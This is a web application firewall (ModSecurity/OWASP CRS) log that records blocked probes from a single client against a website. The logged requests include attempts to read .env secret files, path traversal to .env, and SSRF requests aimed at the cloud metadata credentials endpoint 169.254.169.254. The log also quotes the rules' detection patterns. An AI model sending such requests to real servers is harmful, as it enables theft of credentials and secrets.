[Tue May 12 06:16:10.114220 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:65072] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpihs7kySIUZ3ORnI1IAAAAQA"]
[Tue May 12 06:16:10.114421 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:65072] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpihs7kySIUZ3ORnI1IAAAAQA"]
[Tue May 12 06:16:10.214164 2026] [security2:error] [pid 1825179:tid 1825219] [client 45.148.10.166:35884] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKphtr1yOh9TvizezitegAAAFU"]
[Tue May 12 06:16:10.235138 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:64922] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKphxs7kySIUZ3ORnI1HQAAARE"]
[Tue May 12 06:16:10.744134 2026] [security2:error] [pid 1820198:tid 1820208] [client 45.148.10.166:64904] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKph81tk6y7yBJLpJpE3wAAAIg"]
[Tue May 12 06:16:11.298821 2026] [security2:error] [pid 1825179:tid 1825197] [client 43.159.143.139:36622] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tct-telecom.fr"] [uri "/"] [unique_id "agKpi9r1yOh9TvizezithwAAAEA"], referer: http://www.tct-telecom.fr
[Tue May 12 06:16:11.333145 2026] [security2:error] [pid 1842385:tid 1842410] [client 45.148.10.166:36076] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKphRs7kySIUZ3ORnI1GAAAARM"]
[Tue May 12 06:16:11.446195 2026] [security2:error] [pid 1825179:tid 1825206] [client 45.148.10.166:64894] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKph9r1yOh9TvizezitggAAAEg"]
[Tue May 12 06:16:11.452821 2026] [security2:error] [pid 1825287:tid 1825305] [client 45.148.10.166:64866] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKphwgpmE1yW0glLdg8NAAAAME"]
[Tue May 12 06:16:11.950881 2026] [security2:error] [pid 1825287:tid 1825323] [client 45.148.10.166:65130] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpiwgpmE1yW0glLdg8OgAAANI"]
[Tue May 12 06:16:11.950980 2026] [security2:error] [pid 1825287:tid 1825323] [client 45.148.10.166:65130] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpiwgpmE1yW0glLdg8OgAAANI"]
[Tue May 12 06:16:11.951159 2026] [security2:error] [pid 1825287:tid 1825323] [client 45.148.10.166:65130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpiwgpmE1yW0glLdg8OgAAANI"]
[Tue May 12 06:16:12.548128 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.166:35846] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKphfaAnTZtx1_H_wzF6wAAAVI"]
[Tue May 12 06:16:12.562417 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:65072] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpihs7kySIUZ3ORnI1IAAAAQA"]
[Tue May 12 06:16:12.572958 2026] [security2:error] [pid 1844863:tid 1844875] [client 45.148.10.166:65152] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.tchatbooster.com"] [uri "/_next/image/"] [unique_id "agKpjPaAnTZtx1_H_wzF_wAAAUY"]
[Tue May 12 06:16:12.573685 2026] [security2:error] [pid 1844863:tid 1844875] [client 45.148.10.166:65152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/_next/image/"] [unique_id "agKpjPaAnTZtx1_H_wzF_wAAAUY"]
[Tue May 12 06:16:12.581285 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.166:65168] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKpjM1tk6y7yBJLpJpE5QAAAI4"]
[Tue May 12 06:16:12.581352 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.166:65168] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKpjM1tk6y7yBJLpJpE5QAAAI4"]
[Tue May 12 06:16:12.581380 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.166:65168] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKpjM1tk6y7yBJLpJpE5QAAAI4"]
[Tue May 12 06:16:12.581600 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.166:65168] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKpjM1tk6y7yBJLpJpE5QAAAI4"]
[Tue May 12 06:16:12.581637 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.166:65168] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKpjM1tk6y7yBJLpJpE5QAAAI4"]
[Tue May 12 06:16:12.582061 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.166:65168] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 22)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKpjM1tk6y7yBJLpJpE5QAAAI4"]
[Tue May 12 06:16:12.595320 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:65072] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.staging"] [unique_id "agKpjBs7kySIUZ3ORnI1JgAAAQA"]
[Tue May 12 06:16:12.595519 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:65072] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.staging"] [unique_id "agKpjBs7kySIUZ3ORnI1JgAAAQA"]
[Tue May 12 06:16:12.683455 2026] [security2:error] [pid 1808852:tid 1808861] [client 45.148.10.166:35872] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKphBfeipD4uoG21Fo_ogAAAAY"]
[Tue May 12 06:16:12.708153 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.166:36104] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKphs1tk6y7yBJLpJpE2wAAAJY"]
[Tue May 12 06:16:13.169329 2026] [security2:error] [pid 1808852:tid 1808874] [client 45.148.10.166:64940] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKphxfeipD4uoG21Fo_qAAAABM"]
[Tue May 12 06:16:13.352165 2026] [security2:error] [pid 1825287:tid 1825307] [client 45.148.10.166:36120] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKphggpmE1yW0glLdg8MQAAAMI"]
[Tue May 12 06:16:13.942949 2026] [security2:error] [pid 1844863:tid 1844873] [client 45.148.10.166:64842] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKph_aAnTZtx1_H_wzF9AAAAUQ"]
[Tue May 12 06:16:13.973579 2026] [security2:error] [pid 1825287:tid 1825323] [client 45.148.10.166:65130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpiwgpmE1yW0glLdg8OgAAANI"]
[Tue May 12 06:16:14.383050 2026] [security2:error] [pid 1825287:tid 1825323] [client 45.148.10.166:65130] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpjggpmE1yW0glLdg8QwAAANI"]
[Tue May 12 06:16:14.383132 2026] [security2:error] [pid 1825287:tid 1825323] [client 45.148.10.166:65130] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpjggpmE1yW0glLdg8QwAAANI"]
[Tue May 12 06:16:14.383275 2026] [security2:error] [pid 1825287:tid 1825323] [client 45.148.10.166:65130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpjggpmE1yW0glLdg8QwAAANI"]
[Tue May 12 06:16:15.360548 2026] [security2:error] [pid 1844863:tid 1844882] [client 45.148.10.166:64874] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKph_aAnTZtx1_H_wzF9wAAAU0"]
[Tue May 12 06:16:15.411186 2026] [security2:error] [pid 1825179:tid 1825214] [client 45.148.10.166:64846] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKph9r1yOh9TvizezitgQAAAFA"]
[Tue May 12 06:16:15.990475 2026] [security2:error] [pid 1820198:tid 1820211] [client 45.148.10.166:65222] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.tchatbooster.com"] [uri "/_next/image/"] [unique_id "agKpj81tk6y7yBJLpJpE8AAAAIs"]
[Tue May 12 06:16:15.991244 2026] [security2:error] [pid 1820198:tid 1820211] [client 45.148.10.166:65222] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/_next/image/"] [unique_id "agKpj81tk6y7yBJLpJpE8AAAAIs"]
[Tue May 12 06:16:15.996016 2026] [security2:error] [pid 1842385:tid 1842399] [client 45.148.10.166:65232] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKpjxs7kySIUZ3ORnI1MgAAAQk"]
